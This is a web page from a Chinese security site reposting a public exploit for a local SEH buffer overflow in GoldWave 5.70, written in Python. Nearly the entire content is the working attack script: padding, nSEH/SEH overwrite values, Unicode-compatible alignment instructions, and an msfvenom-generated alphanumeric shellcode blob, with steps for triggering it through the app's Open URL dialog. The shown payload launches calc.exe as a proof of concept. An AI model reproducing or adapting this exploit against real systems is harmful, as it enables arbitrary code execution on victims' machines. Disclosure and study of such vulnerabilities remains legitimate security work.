首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 GoldWave 5.70 - Local Buffer Overflow (SEH Unicode) 来源：@bzyo_ 作者：bzyo 发布时间：2018-04-10   #!/usr/bin/python   # # Exploit Author: bzyo # Twitter: @bzyo_ # Exploit Title:  GoldWave 5.70 - Local Buffer Overflow (SEH Unicode) # Date: 04-05-2018 # Vulnerable Software: GoldWave 5.70 # Vendor Homepage: https://www.goldwave.com/ # Version: 5.70 # Software Link: http://goldwave.com//downloads/gwave570.exe # Tested Windows 7 SP1 x86 # # # PoC # 1. generate goldwave570.txt, copy contents to clipboard # 2. open gold wave app # 3. select File, Open URL... # 4. paste contents from clipboard after 'http://' # 5. select OK # 6. pop calc #   filename="goldwave570.txt"   junk = "\x71"*1019   #popad nseh = "\x61\x62"   #0x006d000f : pop ecx # pop ebp # ret  | startnull,unicode,ascii {PAGE_EXECUTE_READ} [GoldWave.exe] seh = "\x0f\x6d"   valign = ( "\x53"                  #push ebx "\x47"                  #align "\x58"                  #pop eax "\x47"                  #align "\x05\x16\x11"          #add eax,600  "\x47"                  #align "\x2d\x13\x11"          #sub eax,300 "\x47"                  #align "\x50"                  #push eax "\x47"                  #align "\xc3"                  #retn )   #nops to shellcode nops = "\x71" * 365   #msfvenom -p windows/exec CMD=calc.exe -e x86/unicode_upper BufferRegister=EAX #Payload size: 517 bytes calc = ( "PPYAIAIAIAIAQATAXAZAPU3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AA" "PAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JBKLIXTBKPM0M0S0DIK501I0C44" "K0PP0DKPRLLTKQBMDTKBRO8LOFWOZMV01KOFLOLS13LLBNLO0WQXOLMKQI7K2KB0RQGTKPRN0DK0J" "OL4K0LN1CHISOXKQXQ214K0YMPKQJ3DK0IN8K3NZOYTKNT4KM1YFNQKO6L91XOLMM1WW08IP45ZVK" "S3MZXOKSMMTRUK4B8TKPXO4M1YCBFDKLLPKDKR8MLM1YC4KKTTKM18PU9PDO4MT1K1KQQR91J0QKO" "IP1O1O1J4KN2ZK4MQMRJM14MSUVRM0M0M0PP2HNQTKROSWKO8UWKZPH55R1FQX6FF5WMEMKOXUOLL" "F3LKZE0KKYPRUM5GKOWMCCBRO2JM023KOYE1S1QRLBCNNRERX1UM0AA")   fill = "\x71"* 5000   buffer = junk + nseh + seh + valign + nops + calc + fill    textfile = open(filename , 'w') textfile.write(buffer) textfile.close()   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·H2 Database - 'Alias' Arbitrar ·CyberArk Password Vault < 9.7 ·SSH / SSL RSA Private Key Pass ·CyberArk Password Vault Web Ac ·Adobe Flash 28.0.0.137 Remote ·DVD X Player Standard 5.5.3.9 ·PMS 0.42 Stack-Based Buffer Ov ·Google Chrome V8 JIT - 'LoadEl ·Sophos Endpoint Protection Con ·SysGauge Pro 4.6.12 Local Buff ·Sophos Endpoint Protection 10. ·F5 BIG-IP 11.6 SSL Virtual Ser   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved